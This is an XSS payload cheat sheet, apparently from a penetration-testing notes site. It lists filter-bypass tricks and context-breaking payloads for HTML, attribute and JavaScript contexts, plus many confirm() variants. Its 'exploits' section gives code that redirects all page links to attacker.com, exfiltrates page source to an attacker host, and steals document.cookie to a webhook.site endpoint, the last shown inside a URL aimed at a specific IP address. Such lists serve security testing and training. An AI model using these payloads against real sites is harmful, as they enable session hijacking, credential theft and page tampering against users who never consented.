XSS

https://github.com/payloadbox/xss-payload-list

Check the reflected text and make a query appropriately!

<BODY ONLOAD=javascript:alert(1)>

If alert() is being filtered

eval("ale" + "rt('xss')")

If <> brackets are fiiltered.

"onmouseover="alert(1)

If single quotes are filtered '

Use double quotes and vice versa

One stop payload!!

Awesome Context Breaking

HTML Context

Case: <tag>You searched for $input. </tag>

<svg onload=alert()>
</tag><svg onload=alert()>

Attribute Context

Case: <tag attribute="$input">

"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
"onmouseover=alert()//
"autofocus/onfocus="alert()

JavaScript Context

Case: <script> var new something = '$input'; </script>

'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>

Awesome Confirm Variants

Yep, confirm because alert is too mainstream.

confirm()
confirm``
(confirm``)
{confirm``}
[confirm``]
(((confirm)))``
co\u006efirm()
new class extends confirm``{}
[8].find(confirm)
[8].map(confirm)
[8].some(confirm)
[8].every(confirm)
[8].filter(confirm)
[8].findIndex(confirm)

Awesome Exploits

Replace all links

Array.from(document.getElementsByTagName("a")).forEach(function(i) {
  i.href = "https://attacker.com";
});

Source Code Stealer

<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">

Reaching our own server using XSS and stealing sensitive information

http://18.225.156.202:9090/blog?blogNumber=2%22%3E%3Cimg%20src=x%20onerror=this.src=%27https://webhook.site/e20454b9-297d-47d2-bb93-9da689061414/?%27%2bdocument.cookie;%3E

Payload: 2"><img src=x onerror=this.src='https://webhook.site/e20454b9-297d-47d2-bb93-9da689061414/?'+document.cookie;>

Further,

PreviousSSTI NextBuffer Overflow Prep

Last updated 9 months ago